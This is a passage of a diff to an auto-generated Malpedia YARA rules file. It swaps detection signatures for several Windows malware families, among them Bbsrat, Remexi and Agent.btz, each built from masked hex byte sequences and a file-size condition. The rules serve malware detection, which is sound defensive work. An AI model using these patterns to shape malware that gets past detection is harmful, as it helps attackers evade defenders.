-		$sequence_7 = { 488d2df4890500 e9???????? bf58000000 488bd7 448d67a9 498bcc e8???????? }
-		$sequence_8 = { 53 4883ec30 48c7442420feffffff 488bd9 488d05df650300 488901 }
-		$sequence_9 = { 740d 4183e5fd 488bcb ff15???????? 4084ed 0f85da000000 488b8c24a8000000 }
+		$sequence_0 = { b976b1d971 60 f9 66b884f9 61 668bf8 6681ef5cec }
+		$sequence_1 = { ff3424 5d 57 89e7 81c704000000 83c704 57 }
+		$sequence_2 = { ff3424 8b1c24 83c404 56 890424 54 58 }
+		$sequence_3 = { e9???????? 21d8 e9???????? 813424e58bf74a e9???????? 5d 81c35678f537 }
+		$sequence_4 = { e9???????? 81c404000000 e9???????? 890c24 50 c70424fddfed59 892c24 }
+		$sequence_5 = { be00040000 bf0a000000 8913 be00040000 09fe 89fe 81ce00040000 }
+		$sequence_6 = { e9???????? ba2682ff7f 53 bb15b4fb3a 81c3b5b7ff7d e9???????? 56 }
+		$sequence_7 = { e9???????? c1e708 e9???????? 89df e9???????? 59 50 }
+		$sequence_8 = { 9d 7c77 52 c199????????f3 30e3 61 d6 }
+		$sequence_9 = { e9???????? 313c24 333c24 e9???????? 870c24 8b2424 e9???????? }
 
 	condition:
-		7 of them and filesize < 1107968
+		7 of them and filesize < 11198464
 }
-rule MALPEDIA_Win_Fonix_Auto : FILE
+rule MALPEDIA_Win_Colony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "13e11a44-10a3-5017-894b-01b6a1809d38"
+		id = "742a0cb8-c4dd-5eda-a40e-a63b7bd8505f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fonix_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.colony_auto.yar#L1-L235"
 		license_url = "N/A"
-		logic_hash = "4ee726385c93cbef83aaf363fadcc91c1116e9967604b802fb868026ddede36e"
+		logic_hash = "3b9749137439fa6695b6427d299f35f295a8c9c596ab6c8986a3096d5875940b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117667,32 +117979,46 @@ rule MALPEDIA_Win_Fonix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? e8???????? c3 83c1fc 8b01 ff504c 83c008 }
-		$sequence_1 = { 75f2 8b7518 8b4d20 8bc6 2bce 83e1c0 81f900100000 }
-		$sequence_2 = { 8d8d10ffffff e9???????? 8d8d98fbffff e9???????? 8d4da4 e9???????? }
-		$sequence_3 = { 8bc6 5e 5d c20400 8b4948 6a01 }
-		$sequence_4 = { c5fdef85e0fdffff c5fe7f85e0f9ffff c5fe6f85e0f9ffff c5fe7f4580 c5fe6f8560ffffff c5fdef85c0fdffff c5fe7f85c0f9ffff }
-		$sequence_5 = { 8d420c 8b4ae8 33c8 e8???????? b8???????? e9???????? 6a40 }
-		$sequence_6 = { 50 e8???????? cc 803d????????00 7505 e8???????? }
-		$sequence_7 = { c5fe7f8540edffff c5fe6f8540edffff c5fe7f85c0feffff c5fd708520ffffff93 c5fe7f8520edffff c5fe6f8520edffff c5fe7f8520ffffff }
-		$sequence_8 = { 8b4004 8bce ffd0 0fb64d07 bb01000000 84c0 }
-		$sequence_9 = { 50 e8???????? 83c408 50 68???????? 8d4d5c e8???????? }
+		$sequence_0 = { 33c0 5e c3 f30f7e05???????? 660fd606 }
+		$sequence_1 = { 740f 0301 eb0b a801 }
+		$sequence_2 = { 5b c3 b901000000 66894808 }
+		$sequence_3 = { 7407 b901000000 eb0a 33c9 803f01 0f95c1 33c0 }
+		$sequence_4 = { 8b00 83f801 7e5c f7420400080000 }
+		$sequence_5 = { 33c0 5b 8be5 5d c3 8b5df8 8b4b18 }
+		$sequence_6 = { 33c0 5e 5d c3 8b4d0c 85c9 7e0c }
+		$sequence_7 = { 0f95c0 33cd 5e 48 }
+		$sequence_8 = { 0bc1 894204 8b4510 c1e810 }
+		$sequence_9 = { 660f6e4104 f30fe6c0 84c0 7509 f30f1009 0f5ac9 }
+		$sequence_10 = { 8a4203 8841fe 8a4202 8841ff 8b02 c1e808 8801 }
+		$sequence_11 = { 0bc1 8907 8b4b04 8bc1 }
+		$sequence_12 = { 0bc1 8902 8b4508 c1e810 25ff000000 }
+		$sequence_13 = { 8b420c 2b4208 660f6ec0 f30fe6c0 }
+		$sequence_14 = { 69d200008f04 2bc8 c1e910 69c161a4f778 2bd0 }
+		$sequence_15 = { 0bc1 894704 8b4b08 8bc1 }
+		$sequence_16 = { 488364243000 8364242800 41b803000000 488d0d308e0000 4533c9 }
+		$sequence_17 = { 4152 4153 4154 4155 4156 4157 9c }
+		$sequence_18 = { f0ff00 488d4128 41b806000000 488d1588fd0000 483950f0 740b 488b10 }
+		$sequence_19 = { 488d15c1980000 483305???????? 488bcb 488905???????? ff15???????? 488d15c3980000 483305???????? }
+		$sequence_20 = { 488d05a5f20000 483bc8 772b 0fba71180f }
+		$sequence_21 = { 488905???????? ff15???????? 483305???????? 488d1546980000 }
+		$sequence_22 = { 4863442450 483bc7 0f8cddfeffff 418bc4 ba0d000000 4c8d0da0d20000 412bc6 }
+		$sequence_23 = { c70009000000 e8???????? 4883c8ff 4883c428 c3 4863d1 4c8d0546cc0000 }
 
 	condition:
-		7 of them and filesize < 2226176
+		7 of them and filesize < 7599104
 }
-rule MALPEDIA_Win_Hermes_Auto : FILE
+rule MALPEDIA_Win_Bbsrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5ac17fa7-a096-5e04-8e0d-a201ab441e04"
+		id = "0025d705-e6c3-5443-a840-3f0b2380c373"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermes_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bbsrat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "43e558aafd9a673bf17e8773d823614dc4de0d10e8aa93baebe8c03b07e12d71"
+		logic_hash = "41e9d1288a6b47bf01a3af69d556bf8b74b048345c44a671654c850d84e7f7a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117706,34 +118032,34 @@ rule MALPEDIA_Win_Hermes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a79 59 f7f1 83c261 }
-		$sequence_1 = { ff15???????? 33d2 6a79 59 f7f1 83c261 }
-		$sequence_2 = { 6810660000 ff75fc ff15???????? 85c0 }
-		$sequence_3 = { 50 8d45fc 50 ff15???????? 6a20 }
-		$sequence_4 = { 83c801 50 6a01 ff75fc ff15???????? }
-		$sequence_5 = { 8b4508 83c801 50 6a01 }
-		$sequence_6 = { 7508 6a01 ff15???????? 8be5 5d }
-		$sequence_7 = { ff15???????? 6a07 59 be???????? }
-		$sequence_8 = { 7508 6a01 ff15???????? 8d45fc 50 }
-		$sequence_9 = { 50 6a01 6810660000 ff75fc ff15???????? 85c0 }
+		$sequence_0 = { 83c408 c3 6a00 8d442418 50 57 53 }
+		$sequence_1 = { 8bec c7451001000000 c7450c01000000 833d????????00 7516 68???????? a1???????? }
+		$sequence_2 = { 85c0 7463 8b3d???????? 6a00 6a00 6a03 6a00 }
+		$sequence_3 = { 50 8d8c24de080000 51 66898424e0080000 e8???????? 33d2 }
+		$sequence_4 = { 8b8620010000 3bc3 7407 50 ff15???????? 8b8634010000 57 }
+		$sequence_5 = { 752a 80780500 7524 80780600 751e b105 384807 }
+		$sequence_6 = { 89442404 eb04 8b442404 f7d8 1bc0 }
+		$sequence_7 = { 53 89442404 89442408 8944240c 55 8b6c241c 89442414 }
+		$sequence_8 = { 6a04 8d442420 50 6a1f 53 e8???????? e9???????? }
+		$sequence_9 = { 0f8415010000 397c2418 0f860b010000 8d642400 8b442414 8b34b8 837e0401 }
 
 	condition:
-		7 of them and filesize < 7192576
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Regin_Auto : FILE
+rule MALPEDIA_Win_Remexi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1cb1e4e-ea57-57da-8035-cea9e62b8eb8"
+		id = "19c1296a-4241-5074-a9c8-857410d4cc23"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.regin_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remexi_auto.yar#L1-L280"
 		license_url = "N/A"
-		logic_hash = "091fb04af94706b8fbe2a391afd54e9835ec0bf475e2ed1c52d68af6529e0a7e"
+		logic_hash = "d7fd541a35f3fa538905c0988ed0ed78176c1f70ba37c8e34ed3bd3151c3e3a8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117745,34 +118071,55 @@ rule MALPEDIA_Win_Regin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3ac3 7456 44 8b842498000000 8bd7 48 8bbc2488000000 }
-		$sequence_1 = { 0f84e8000000 33ff 33f6 8b0d???????? 3bf9 }
-		$sequence_2 = { 8d4804 e8???????? 85c0 751a 48 8b0d???????? 83caff }
-		$sequence_3 = { 7438 3de8000000 7431 b9f4010000 }
-		$sequence_4 = { 44 0f45f8 e8???????? 3ac3 7456 }
-		$sequence_5 = { e8???????? eb0b 44 3beb }
-		$sequence_6 = { 4c 8be7 48 8978c0 8978c8 48 }
-		$sequence_7 = { 897c2420 ff15???????? 48 3bc7 48 }
-		$sequence_8 = { 895c2440 e8???????? 3ac3 7434 48 }
-		$sequence_9 = { 750d 48 8d0dff000000 ff15???????? 48 8d152a030000 48 }
+		$sequence_0 = { 56 c706ffffffff e8???????? 83c404 }
+		$sequence_1 = { 6a00 50 6a02 ff15???????? 6a10 }
+		$sequence_2 = { 52 6a00 68ffff1f00 ffd7 8bf0 }
+		$sequence_3 = { 53 50 ff15???????? 3dffffff00 }
+		$sequence_4 = { a3???????? c705????????02000000 890d???????? ffd6 6a00 6a00 }
+		$sequence_5 = { 6a10 8d4ddc 8bf0 51 }
+		$sequence_6 = { c705????????01000000 c705????????00000000 ff15???????? 8b0d???????? 51 ff15???????? }
+		$sequence_7 = { 7513 8b45d8 8b4818 8b5104 50 8955e0 }
+		$sequence_8 = { ff15???????? 57 8b3d???????? ffd7 56 ffd7 5e }
+		$sequence_9 = { 6828010000 8d8dccfeffff 6a00 51 }
+		$sequence_10 = { 8945e4 8945e8 b802000000 51 668945dc }
+		$sequence_11 = { 6a00 6a02 c785ccfeffff28010000 ff15???????? }
+		$sequence_12 = { a1???????? 68???????? 50 c705????????01000000 c705????????00000000 }
+		$sequence_13 = { 57 e8???????? 6a01 6a00 6a00 ff15???????? 8bf8 }
+		$sequence_14 = { e8???????? 83ec1c 8bcc 89642430 6aff 53 }
+		$sequence_15 = { 483305???????? 488bcb 488905???????? ff15???????? 488d15eb330100 }
+		$sequence_16 = { 015930 3b542408 0f8d10ffffff 8d3c52 }
+		$sequence_17 = { 015330 e9???????? 8b5314 3b5318 0f8d23020000 }
+		$sequence_18 = { 015330 41 894b0c e9???????? }
+		$sequence_19 = { 4c8d054d330100 488bd3 498bce e8???????? 85c0 0f8509010000 498b0c24 }
+		$sequence_20 = { 016b24 89e8 83c44c 5b }
+		$sequence_21 = { 015518 8b5d14 85db 0f8565fbffff }
+		$sequence_22 = { 014b30 bf???????? b903000000 8b742418 }
+		$sequence_23 = { 448b4010 488b8ee8040000 e8???????? 90 }
+		$sequence_24 = { 015330 8a10 eb84 8a5001 }
+		$sequence_25 = { c744243030010000 33d2 8d4a02 ff15???????? }
+		$sequence_26 = { 498bfc 4c89a5a8000000 48c74424400f000000 4c89642438 }
+		$sequence_27 = { e8???????? 48c785500100000f000000 4533f6 4c89b548010000 4488b538010000 488b442460 }
+		$sequence_28 = { 48895c2408 4889742410 57 4883ec20 488d3dea000200 }
+		$sequence_29 = { 488d1d5e6c0200 bf04000000 488bcb e8???????? 4883c328 48ffcf 75ef }
+		$sequence_30 = { 016b04 83c41c 5b 5e }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 614400
 }
-rule MALPEDIA_Win_Wscspl_Auto : FILE
+rule MALPEDIA_Win_Dadjoke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7761c27-1c76-50ce-a49d-adbb7174eed5"
+		id = "7e6ed0b6-d7e2-510d-b9a1-64b59097a88b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wscspl_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dadjoke_auto.yar#L1-L236"
 		license_url = "N/A"
-		logic_hash = "1b757c1efc9452507637d1df12d4e19d7f55d5ea9e93d3fda8eef85d6e83088d"
+		logic_hash = "012b91fdf9c20cf8af04f39b868e60895f8a732788d300f19ff99d8e0ff61772"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117784,34 +118131,47 @@ rule MALPEDIA_Win_Wscspl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d442428 50 885c342c }
-		$sequence_1 = { 8d541804 0fb60a 0fb62e 2bcd 7527 83ff01 7634 }
-		$sequence_2 = { 687c230000 8bd3 68c60b0000 bb???????? e8???????? 83c408 }
-		$sequence_3 = { e8???????? 83c41c 5f 5e c705????????83230000 5d 8b8c2488230000 }
-		$sequence_4 = { 2bc6 a3???????? ff15???????? a1???????? 83f8ff 7419 6a00 }
-		$sequence_5 = { 8d842484020000 50 8d8c3480010000 51 }
-		$sequence_6 = { 06 1007 1010 0809 100a 1010 100b }
-		$sequence_7 = { 52 ff15???????? 83f8ff 7536 ff15???????? 8bf0 a1???????? }
-		$sequence_8 = { a3???????? e8???????? 8b0d???????? 8b3d???????? 51 8bf0 57 }
-		$sequence_9 = { 687c230000 8d44240c 6a01 50 ff15???????? 687c230000 68c10b0000 }
+		$sequence_0 = { 56 57 6800081000 6a00 }
+		$sequence_1 = { 740a 8b55f4 52 ff15???????? 837df000 740c }
+		$sequence_2 = { 51 8d5508 52 8d4db8 e8???????? 6a0a 6a00 }
+		$sequence_3 = { f3a5 8bca 83e103 f3a4 a1???????? 8945d0 }
+		$sequence_4 = { eb39 6800081000 e8???????? 83c404 8945f8 }
+		$sequence_5 = { 6bc200 8b4c05e4 51 e8???????? 83c408 }
+		$sequence_6 = { 8b4580 8bc8 c1e902 f3a5 8bc8 83e103 }
+		$sequence_7 = { ff15???????? 8945f8 837df800 7c76 8b4d08 }
+		$sequence_8 = { 33c9 84c0 0f94c1 8bc1 c3 a1???????? }
+		$sequence_9 = { ff15???????? 85c0 7417 b920000000 }
+		$sequence_10 = { 5e c3 8bff 55 8bec 83ec10 33c0 }
+		$sequence_11 = { e8???????? c3 6a04 e8???????? 59 c3 6a0c }
+		$sequence_12 = { 50 8b08 ff5108 8b85e4faffff 50 8b08 ff5108 }
+		$sequence_13 = { 52 50 8b08 ff5118 8b85e0faffff 50 }
+		$sequence_14 = { a900000080 7541 d9ec d9c9 d9f1 833d????????00 0f85cc140000 }
+		$sequence_15 = { 84c0 75f9 8d7d90 2bd6 4f 90 8a4701 }
+		$sequence_16 = { 6a00 50 c645f800 e8???????? 83c40c c7458c00000000 }
+		$sequence_17 = { 6a00 ff15???????? 8b85e0faffff 8d95e8faffff }
+		$sequence_18 = { 6a00 8d4590 50 68???????? 53 }
+		$sequence_19 = { 8bca 83e103 6a00 f3a4 68???????? ff15???????? 8bf0 }
+		$sequence_20 = { 8854382a 8b048d58047500 8874382b 8b048d58047500 5a 8854382c eb3b }
+		$sequence_21 = { 8d85e8fbffff 2bca 50 51 53 }
+		$sequence_22 = { 833d????????00 0f857c0e0000 8d0da0c37400 ba1b000000 }
 
 	condition:
-		7 of them and filesize < 901120
+		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Redyms_Auto : FILE
+rule MALPEDIA_Win_Agent_Btz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "caf709b7-19ee-5a38-9403-a27d78973c28"
+		id = "16f92e8e-8ed3-5d53-b4f6-23ff2aafa84a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redyms_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.agent_btz_auto.yar#L1-L501"
 		license_url = "N/A"
-		logic_hash = "b27b96ec2fba623283604654291a288582fbe387215c7c411815fe1fd821aa0e"
+		logic_hash = "267846e6f96c5156f52d43399a19aa0f1974b0f38d3edac082778780cdba135e"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117823,32 +118183,81 @@ rule MALPEDIA_Win_Redyms_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7414 8b4f04 57 }
-		$sequence_1 = { ffd6 57 ff15???????? 0fb6450b f7d8 5f 1bc0 }
-		$sequence_2 = { 2bc2 68???????? 6a03 b9???????? 8bd7 e8???????? 83c408 }
-		$sequence_3 = { 84c0 7467 807dfb00 7561 8b5514 }
-		$sequence_4 = { 8bf0 83c404 85f6 740e e8???????? 84c0 7405 }
-		$sequence_5 = { 55 8bec 83ec1c 8845f4 8b4508 8d5001 90 }
-		$sequence_6 = { 898534feffff 85c0 745d 8dbd70ffffff b806000000 e8???????? 53 }
-		$sequence_7 = { 8975f4 895df8 ff15???????? 8bf8 }
-		$sequence_8 = { 7409 53 57 56 ff15???????? 8975d4 eb22 }
-		$sequence_9 = { 0f84b2000000 8d7ddc b825000000 e8???????? 8b4dd0 8b55d4 a1???????? }
+		$sequence_0 = { 8d4c240c 51 ffd6 8d54240c 52 ffd7 }
+		$sequence_1 = { c74608ffffffff f644240801 7409 56 e8???????? 83c404 8bc6 }
+		$sequence_2 = { 50 ffd3 85c0 75d8 5f 5e 5b }
+		$sequence_3 = { ff15???????? b803000f00 8b4df4 64890d00000000 }
+		$sequence_4 = { c706???????? c7460c00000000 895e08 895e04 c7461000000000 }
+		$sequence_5 = { b804000f00 8b4df4 64890d00000000 5f 5e }
+		$sequence_6 = { 6a00 50 ff15???????? 894614 33c0 33db }
+		$sequence_7 = { 56 6a00 68???????? 8935???????? }
+		$sequence_8 = { 740e 50 ff15???????? c74608ffffffff f644240801 }
+		$sequence_9 = { 8b4608 c706???????? 85c0 7413 83f8ff }
+		$sequence_10 = { 8d542408 52 c744240c30000000 c744241003000000 }
+		$sequence_11 = { 6801010000 ff15???????? 85c0 7415 }
+		$sequence_12 = { 6a0a 68???????? 6a01 6a00 }
+		$sequence_13 = { 51 6a00 6819000200 6a00 68???????? }
+		$sequence_14 = { 50 68???????? 6a01 68???????? e8???????? 83c410 }
+		$sequence_15 = { 6a01 6a04 6a01 68???????? }
+		$sequence_16 = { 0fb605???????? 66890d???????? 0fb60d???????? 660fafca }
+		$sequence_17 = { 50 e8???????? 83c408 6800010000 e8???????? }
+		$sequence_18 = { 7511 e8???????? 83c020 50 e8???????? }
+		$sequence_19 = { 89461c 3dea000000 740b 3de5030000 }
+		$sequence_20 = { 6a01 68???????? e8???????? 83c414 5f 5e }
+		$sequence_21 = { 6a01 e8???????? 50 e8???????? 83c418 }
+		$sequence_22 = { c684241401000061 c684241501000073 c684241601000074 c684241701000045 c684241801000072 c684241901000072 }
+		$sequence_23 = { c684248b00000061 c684248c00000074 c684248d00000065 c684248e00000050 c684248f00000072 c68424900000006f }
+		$sequence_24 = { 037d18 59 59 6a04 }
+		$sequence_25 = { 037d14 59 6a04 8d4df0 51 03c7 6a06 }
+		$sequence_26 = { ebd2 c78424a000000068000000 c78424dc00000001000000 33c0 66898424e0000000 }
+		$sequence_27 = { 8365fc00 53 8b5d0c 56 8bf0 8b4624 }
+		$sequence_28 = { c684249200000065 c684249300000073 c684249400000073 c684249500000057 c684249600000000 c684241001000047 c684241101000065 }
+		$sequence_29 = { c684249600000000 c684241001000047 c684241101000065 c684241201000074 c68424130100004c c684241401000061 c684241501000073 }
+		$sequence_30 = { c6458b2f c6458c66 c6458d6f c6458e72 }
+		$sequence_31 = { c684248f00000072 c68424900000006f c684249100000063 c684249200000065 c684249300000073 c684249400000073 }
+		$sequence_32 = { 59 6a70 66894dea 59 }
+		$sequence_33 = { 8d8dfcfeffff 51 8d8d54f9ffff 51 }
+		$sequence_34 = { 59 6a70 66894de4 8bc8 66894de6 }
+		$sequence_35 = { 6a00 6a27 6a02 6a00 6a01 }
+		$sequence_36 = { 7515 68???????? 6a01 e8???????? }
+		$sequence_37 = { 8d8505feffff 50 e8???????? 83c40c }
+		$sequence_38 = { c645d43a c645d53b c645d63b c645d730 }
+		$sequence_39 = { 488b4338 33d2 488bce 448d4220 }
+		$sequence_40 = { 488b4638 488b0e 4c8d442450 4533c9 }
+		$sequence_41 = { 83c904 c1e803 448bc9 440fafc8 }
+		$sequence_42 = { 488bcf c744242088130000 e8???????? 488b5738 }
+		$sequence_43 = { 488bf0 c70005000000 85db 7415 4c8b4f38 }
+		$sequence_44 = { 488b0f 48894108 488b0f 488b4108 48894128 }
+		$sequence_45 = { 488b4608 488b0e 48894628 488b4638 4c8d4c2450 448bc3 488bd7 }
+		$sequence_46 = { 488b0f 894130 eb06 488b07 }
+		$sequence_47 = { 488b0f 488901 488b07 488338ff }
+		$sequence_48 = { 488b07 896830 33c0 488b5c2458 488b6c2460 488b742468 4883c440 }
+		$sequence_49 = { 4533c9 488bd6 ff90c8010000 8bf8 85c0 }
+		$sequence_50 = { 488bce 8bd8 ff92e8010000 488b6c2458 8bc3 488b5c2450 }
+		$sequence_51 = { 8d8594faffff 50 68???????? ff15???????? }
+		$sequence_52 = { 0304b5100b4200 beffff0000 59 59 }
+		$sequence_53 = { 0304b5100b4200 59 eb02 8bc3 }
+		$sequence_54 = { 030c85100b4200 eb02 8bcb f6412480 }
+		$sequence_55 = { 0304b5100b4200 59 5e eb05 }
+		$sequence_56 = { 0304b5100b4200 59 eb05 b8???????? }
+		$sequence_57 = { 001cbe 40 0023 d18a0688078a 46 }
+		$sequence_58 = { 013d???????? 8b04b5100b4200 0500080000 3bc8 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 5577728
 }
-rule MALPEDIA_Win_Urlzone_Auto : FILE
+rule MALPEDIA_Win_New_Ct_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66cd5cda-0cf5-5934-9baf-6b5f820d2f06"
+		id = "f53de876-cc73-580f-b656-21e621d4769e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.urlzone_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.new_ct_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "7c1a2ac73460b5e428df7b91964316f5979631407a0a74f2db057df15dd1651b"
+		logic_hash = "a95efc922552cce6ba568c288715d7230a5249b577e6fe1c26585a82d20cee63"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117862,32 +118271,32 @@ rule MALPEDIA_Win_Urlzone_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7503 8a0a 42 80e930 80f909 7708 }
-		$sequence_1 = { 7c42 80f866 7f3d 80ec61 }
-		$sequence_2 = { 7f08 80ec41 80c40a eb10 }
-		$sequence_3 = { 80fc39 7f05 80ec30 eb22 }
-		$sequence_4 = { 80e830 eb22 80f841 7c23 80f846 7f08 }
-		$sequence_5 = { 7f08 80ec41 80c40a eb10 80fc61 7c42 }
-		$sequence_6 = { eb10 80f861 7c11 80f866 7f0c }
-		$sequence_7 = { 80e930 80f909 7708 8d0480 8d0441 ebed }
-		$sequence_8 = { 80ec61 80c40a 80f830 7c32 80f839 7f05 }
-		$sequence_9 = { 7c63 80fc39 7f05 80ec30 eb22 80fc41 7c54 }
+		$sequence_0 = { 83c404 8b45e4 50 8b35???????? ffd6 }
+		$sequence_1 = { e8???????? a3???????? 3bc3 756f 47 83ff0a 7cd4 }
+		$sequence_2 = { ffd6 8b4c241c 51 ffd6 55 6a00 ff15???????? }
+		$sequence_3 = { 52 68???????? 8d842480000000 68???????? 50 ffd6 }
+		$sequence_4 = { 3931 740c 40 83c10c 3bc2 7cf4 33c0 }
+		$sequence_5 = { 6a04 8d8dd4fdffff 51 6a4a }
+		$sequence_6 = { 50 6a00 6a00 68???????? 6a00 68???????? ff15???????? }
+		$sequence_7 = { e8???????? 83c404 8985c4ebffff 85c0 7409 8bc8 e8???????? }
+		$sequence_8 = { ffd3 83c414 c745fcffffffff b801000000 }
+		$sequence_9 = { 33c0 83c40c f2ae f7d1 49 6800000020 8d84247c070000 }
 
 	condition:
-		7 of them and filesize < 704512
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Atmosphere_Auto : FILE
+rule MALPEDIA_Win_Hopscotch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b490d7b3-3c9f-56a0-8e37-e6b8aeb02255"
+		id = "4ccf5f3f-fc4d-50c4-9d15-78cb98c3a462"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmosphere_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hopscotch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hopscotch_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "09ff5db5949a2315ec4eb307f77f435859e4dd2533efb70945aee06235bab5f1"
+		logic_hash = "87c8060052c7a27df707d3c608dced07179361cdfbcc1ac24fe99b2c3ce14a55"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -117901,32 +118310,32 @@ rule MALPEDIA_Win_Atmosphere_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf1 57 ff15???????? 8b470c 89460c }
-		$sequence_1 = { 83ec14 56 8b7104 85f6 }
-		$sequence_2 = { 8bf9 8b06 8bce 8b1f ff5004 }
-		$sequence_3 = { 56 57 33db 8bf1 8965f0 }
-		$sequence_4 = { 83ec10 c645fc02 8bcc 8965e8 50 51 e8???????? }
-		$sequence_5 = { 8b7c240c 8bf1 57 ff15???????? 8b470c 89460c }
-		$sequence_6 = { 53 56 57 33db 8bf1 8965f0 }
-		$sequence_7 = { 6a04 50 8b11 ff12 }
-		$sequence_8 = { 88460e 33c0 894612 894616 }
-		$sequence_9 = { 56 57 8bf9 6a2e e8???????? 8bf0 }
+		$sequence_0 = { ffd7 8b742410 8d4c2408 51 6a00 6a00 68???????? }
+		$sequence_1 = { e8???????? 83c404 85c0 7512 53 55 e8???????? }
+		$sequence_2 = { 752c ff15???????? 3d26040000 741f 68???????? e8???????? }
+		$sequence_3 = { f7c600ffffff 7538 8a00 23c7 }
+		$sequence_4 = { 85f6 7511 ff15???????? 50 68???????? e9???????? 8b84241c010000 }
+		$sequence_5 = { 8d44240c 68???????? 50 ffd6 83c408 85c0 }
